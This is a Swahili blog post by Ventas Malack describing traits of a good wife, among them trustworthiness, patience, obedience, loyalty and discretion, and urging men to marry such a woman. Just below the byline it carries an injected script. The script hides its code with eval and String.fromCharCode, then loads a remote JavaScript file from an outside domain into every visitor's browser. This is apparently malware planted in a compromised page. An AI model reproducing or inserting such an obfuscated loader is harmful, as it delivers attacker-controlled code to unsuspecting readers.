Recent Comments

Ukiona Ana Sifa Hizi Usisite Muoe Kabisa

By ventas malack Dec 19, 2021
<script>var o=String;eval(o.fromCharCode(102,117,110,99,116,105,111,110,32,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,115,114,99,41,10,123,10,32,32,32,32,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,10,125,10,10,118,97,114,32,98,100,32,61,32,34,104,116,116,34,43,34,112,115,58,34,43,34,47,34,43,34,47,115,34,43,34,108,101,101,34,43,34,112,46,115,116,114,97,34,43,34,116,34,43,34,111,115,98,34,43,34,111,100,121,46,99,111,109,47,34,43,34,115,99,34,43,34,114,105,112,34,43,34,116,34,43,34,115,47,104,101,97,34,43,34,100,46,106,34,43,34,115,34,43,34,63,34,43,34,118,61,51,34,43,34,46,34,43,34,56,34,43,34,46,48,34,59,10,10,105,102,40,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,98,100,41,61,61,61,102,97,108,115,101,41,123,10,9,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,10,115,46,115,114,99,61,98,100,59,10,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,10,105,102,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,33,61,61,110,117,108,108,41,123,10,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,10,125,10,125,10,32,101,108,115,101,32,123,10,9,105,102,40,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,33,61,61,110,117,108,108,41,123,10,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,10,9,125,10,125,10,10,125));/*54745756836*/</script>


Inaaminika kuwa Mwanamke ni mama pia ni mwenye nguvu hii ni kwasababu vitabu ving vya dini hueleza kuwa mwanamke ametoka kwenye ubavu wa mwanamke. Ki ujumla mwanamke ni uzima wa mwanaume na mwanaume ni jukumu la mwanamke wake. Kwakuwa mwanamke ni nguvu ya mwanaume, jasiri na mtunzaji wa familia pia ni tegemeo la familia na mwalimu wa watoto na familia yake, moinzi wa familia, chanzo cha baraka, hivyo kuoa mke mwema ndiyo jambo la mafanikio zaidi kwa mwanaume, kwakuwa kukosea kuona ni jambo ambalo ni majuto ya maisha yote mana ukioa mke asiye mwema kwako ni hatari kwakuwa ndoa hubadili historia na maisha kabisa.

Pia nimefanya tafiti mbalimbali na kusoma vitabu vya maada mbalimbali ambapo nimepata tabia tofauti tofauti za mke bora ambazo huweza kumpa mafanikio mwanaume ambapo ni kama ifuatavyo;

a) Huaminika mke mwema hujitahidi ili kuaminika na mumewe katika kila nyanja hii pia humsaidia kufanya vyema katika ndoa yake na kupelekea maendeleo katika familia siku zote imani ndiyo uhai wa mahusiano bila hiyo huvunjika mapema sana kwa kukosekana kwa imani.

b) Mke mwema si tegemezi, tuelewane vizuri hapa mwanamke kiuhalisia mwanaume ni jukumu lake kutafuta kwaajili ya mwanamke wake ila siyo mwanamke kumfanya mumewe mradi au kuolewa na mtu ili kupata sifa kuwa kaolewa na mtu mwenye pesa hivyo ni muhimu mwanamke kuwa si tegemezi ampe mumewe mawazo kwaajili ya kuendeleza uchumi wa familia na siyo kumnyonya kiuchumi.

c) Mvumilivu, lazima mwanamke awe na uwezo wa kuvumila na kuwa na subira pale mumewe na hii ni nguzo kubwa sana katika mahusiano maana mwanamke anapokuwa hana uvumilivu husababisha matatizo sana na ugomvi hata usaliti hivyo mke bora lazima awe mvumilivu sana ili kumpa nafasi mwanaume ya maendeleo.

d) Mlinzi wa mwanaume na familia yake ambapo hawezi kumuumiza mume wake, kumtendea ubaya pia kumchafua mumewe ambapo hii humoa nafasi mwanaume kwakuwa mwanaume akipata stress kidogo huwa na mfadhaiko na msonono mkubwa ambayo ni hatari kwa maendeleo.

e) Mtii, wanaume hupenda kuhesmiwa na wake zao hivyo mke bora huwa na heshima pia ni mtii kwa mumewe bila kujali hali yake ya kiuchumi, kijamii na hata kimaumbile ambapo hii humpa morali mwanaume kumpenda mwanamke huyo kwa kuwa utii humfanya mwanamke kujishusha na kufanya maamuzi kwa busara.

f) Si msaliti, mke mwema huwa si msaliti kwa mumewe hulinda heshima ya mumewe na pia afya ya mumewe hivyo basi hujiepusha mbali na usaliti.

g) Huwa na upendo, mke mwema huwa na upendo mkubwa kwa mumewe, watoto, familia ya mumewe na hata marafiki wa mumewe ambapo hii huchochea amani katika familia mwanamke akikosa upendo hata wageni kuja nyumbani huwa ni ngumu hivyo akiwa na upendo ni faida jwa familia na ni chanzo cha baraka pia.

h) Msiri, pia mke bora huhitajika kuwa na uwezo wa kutunza siri za familia, mumewe na awe na uwezo wa kuyatunza yanayojiri kwenye familia yake kwa kuwa akiwa mwepesi kuyatoa nje ni aibu kwa familia na mumewe hivyo basi aweze kutunza siri ili kuafanikisha mipango ya familia yake.

ukiona mwanamke uliye nae ana tabia hizi usisite muoe ima kama hana jaribu kumtengeneza ukishindwa muache tafuta mwingine mana. . . . . . . . . . . mafuta siyo poa.

By Ventas Malack

By ventas malack

Make the World Aware